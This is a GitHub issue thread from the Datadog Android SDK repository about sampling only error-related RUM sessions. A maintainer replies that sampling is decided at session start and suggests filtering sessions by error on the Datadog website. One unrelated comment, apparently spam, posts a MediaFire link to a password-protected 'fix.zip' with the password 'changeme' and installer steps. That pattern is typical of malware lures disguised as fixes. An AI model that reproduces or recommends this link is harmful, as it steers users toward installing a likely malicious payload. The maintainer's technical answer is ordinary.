### ISSUE TITLE
How to Work Around RUM Configuring Sampling for Error-Related Sessions

### ISSUE THREAD

**Issue by BaHungSkedulo** [DataDog/dd-sdk-android#2216]
### Question

Hi Team

We have been using 100% RUM sampling for Android, but now we want to reduce the sampling to only record sessions related to errors. We may either exclude other sessions entirely or set a specific percentage for capturing them.

I've reviewed the base document for RUM and found the following information: 'Configuring sampling based on specific attributes, such as sampling 100% of sessions with errors and 5% otherwise, or only sampling sessions that go through the checkout flow, is not supported. If this feature is critical for your business needs, please create a ticket with Datadog Support.'

It's not crucial in my case, but I would like to know if there's a way to work around this or reduce irrelevant sessions.

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ambushwork** [comment]
Hello,

Thank you for your question! The sample rate for RUM sessions is determined at the start of each session in `RumConfiguration`, and it’s used to decide whether a session should be kept or not. Unfortunately, this means it cannot predict if errors will occur during the session or adjust dynamically based on the session state. At the moment, we don’t have a workaround on the SDK side for this. However, you can still filter sessions by errors directly on the Datadog website.

We understand the importance of this feature and are continuously working on improvements. Your feedback is valuable, and we appreciate your patience as we strive to enhance the experience.

**Comment by BaHungSkedulo** [comment]
Thank you. It's nice to hear that. I hope it will be available soon.
